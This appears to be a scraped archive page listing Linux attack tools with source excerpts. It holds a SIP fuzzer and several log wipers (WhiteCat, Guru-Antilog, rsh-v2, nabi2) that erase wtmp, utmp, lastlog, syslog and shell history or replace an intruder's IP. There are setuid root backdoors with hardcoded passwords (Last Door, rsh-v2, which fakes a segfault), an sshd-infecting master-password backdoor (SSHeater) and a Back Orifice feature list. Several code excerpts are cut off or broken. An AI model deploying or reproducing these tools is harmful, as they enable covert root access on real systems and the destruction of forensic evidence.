Linux

Linux

SIP Army Knife

SIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.

#!/usr/bin/perl
#SIP VoIP Protocol Fuzzer
#Created: Blake Cornell

use strict;
#use warnings; LOTS OF WARNING ____ SOLVE THIS AND INCREASE EFFICIENTY

use IO::Select;
use IO::Socket;
use IO::Socket::INET;
use Getopt::Long;
use Pod::Usage;
use Time::HiRes qw( alarm );
use Digest::MD4 qw( md4_hex );
use Digest::MD5 qw( md5_hex );
use Digest::CRC qw( crc32 crc16 );
use HTML::Entities;

my @timeoutDetection = ();
my @md5Requests = ();
my @md4Requests = ();
my @crc32Requests = ();
my @crc16Requests = ();
my $packetCount = ;
my $socketType='';
my $result = GetOptions('host|h=s' => \(my $host = ''),
      'dport|p=s' => \(my $dport = ''),
      'sport|p=s' => \(my $sport = ''),
      'verbose|v' => \(my $verbose),
      'veryverbose|vv' => \(my $veryVerbose),
      'connection|c' => \(my $connection), #to listen to response or not
      'density|d=s' => \(my $density = ), #determines how many mutations to use
      'timeout|t=s' => \(my $timeout = .1),
      'count' => \(my $countTests = ), #counts the number of packets to test
      'md4' => \(my $md4), #can cause timeouts
      'md5' => \(my $md5), #can cause timeouts
      'crc32' => \(my $crc32), #can cause timeouts
      'crc16' => \(my $crc16), #can cause timeouts
      'start=s' => \(my $startPosition), #if set, then start at this position
      'stringFormats' => \(my $stringFormats),
      'stringOverflows' => \(my $stringOverflows),
      'integerFormats' => \(my $integerFormats),
      'injectHeaders' => \(my $injectHeaders),
      'xss' => \(my $xss),
      'sqli' => \(my $sqli),
      'callId' => \(my $callId), #call id is incremented
      'detectVersion' => \(my $detectVersion),
      'getOptions' => \(my $getOptions),
      'help' => \(my $help),
      'proto=s' => \(my $proto),

Linux Log Eraser

Linux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.

Last Door Log Wiper

Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.

 ___________
|           |Linux
|<Last|Door>|Root-
| --------- |Backdoor
|         O |&
|           |Log-
|           |Cleaner
|___________|~r0ng

Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)

Release Dec 2012 -V1

For a full writeup of the program, please visit my blog, URL above.

[+] What is it?

It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.

[+] Features?

- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
   - Search string replace with new string (e.g. change your ip in the logs)
   - Search string delete string
   - Search string delete line
   - Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
   - User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
   - If you don't logout prior to the process starting, the file search process will be displayed
   - If you do logout prior to the process starting this will allow your .bash_history to refresh
     and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?

- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)

- non-rootuser:~# /bin/LastDoor (run!)

whitecat.c

WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.

/*
 *  This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
 *  It supports perl compatible regular expressions and cleans any binary and
 *  text log files (just correct source a little). WhiteCat is designed for
 *  any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
 *  Use it only for educational purpose.
 *  Don't forget to visit our site and my homepage for new releases:
 *  <a href="http://hellknights.void.ru<br />
" title="http://hellknights.void.ru<br />
">http://hellknights.void.ru<br />
</a> *  <a href="http://shados.0x48k.cc<br />
" title="http://shados.0x48k.cc<br />
">http://shados.0x48k.cc<br />
</a> *  Also, you can mail me any bugs or suggestions:
 *  <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ real.xakep.ru
 *  <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ 0x48k.cc
 *
 *  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software Foundation,
 *  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.  
 */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>


#ifndef UTMP_FILE
    #define UTMP_FILE "/var/run/utmp"
#endif    
#ifndef WTMP_FILE
    #define WTMP_FILE "/var/log/wtmp"
#endif

Guru-Antilog.sh

A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

SSHeater

SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.

c1zc0-ban

Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.

rsh-v2.c

Unix log cleaner that also checks to see if root is logged in.

/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

nabi2.c

Nabi version 2.0 - Advanced /var log wiper for Linux.

/*

     Advanced /var log wiper for linux

     nabi ver 2 ( friendly zap2.c )


    Release Date:
    nabi ver 2 - 3.8 2006 (Wed)
         nabi ver 1 - 1.15 2006 (Sun)
 
  1: zap2)
      # ./nabi -z root
  2: history cleanup)
      # ./nabi -h
  3: string change)
      # ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
      # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )

    Tested on:
      - Debian 3.0r1
      - RH 9.0
      - Fedora core 2
      ..

    CHANGED:
      - add program option parser for split features on this file.
      - erased minor version number of this program.

    BUG FIXED:
      - when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
        cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
        see escape_slash().
   
  comment:
    i become a curious guy when i'm typing some code. what about you all?
    for more useful toolkit. brb!

   
*/



#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define MAX_PATH        1024
#define MAX_DEPTH       128

#define  PROGRAM      "Nabi ver 2 ( <a href="mailto:geinblues@gmail.com">geinblues@gmail.com</a> )"


/*
#define DEBUG
*/


/* proto type */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);

/* linked-list stuffs for file list */
struct file_list
{
        struct file_list *next;
        int depth;
        char d_name[MAX_PATH];
} *head, *tail;

static char root_dir[] = "/var";

int main(int argc, char *argv[])
{
        struct dirent *dp;

Back Orifice (BO)

Back Orifice debuted at DEF CON 6 on August 1, 1998. It was the brainchild of Sir Dystic, a member of the U.S. hacker organization Cult of the Dead Cow. According to the group, its purpose was to demonstrate the lack of security in Microsoft's operating system Windows 98.

The last version was bo2k (back orifice 2k) which previously had the source code open & available for download. Currently we have been unable to locate a copy of that source.

The Back Orifice Server Contains the Following Functionality
System control
Create dialog boxes with the text of your choice. Log keystrokes. Lockup or reboot the machine.

Get detailed system information, including:
current user
cpu type
windows version
memory usage
mounted disks
(including hard drives, cdroms, removable drives and remote network drives) and information for those drives
screensaver password
passwords cached by the user
(including those for dialups, web and network access, and any other password cached by the operating system)

File system control
Copy, rename, delete, view, and search files and directories. File compression and decompression.
Process control
List, kill, and spawn processes.
Registry control
List, create, delete and set keys and values in the registry.
Network control
View all accessible network resources, all incoming and outgoing connections, list, create and delete network connections, list all exported resources and their passwords, create and delete exports.
Multimedia control
Play wav files, capture screen shots, and capture video or still frames from any video input device (like a Quickcam).
Packet redirection
Redirect any incoming TCP or UDP port to any other address & port.
Application redirection
Spawn most console applications (such as command.com) on any TCP port, allowing control of applications via a telnet session.
HTTP server Upload and download files on any port using a www client such as Netscape.

Syndicate content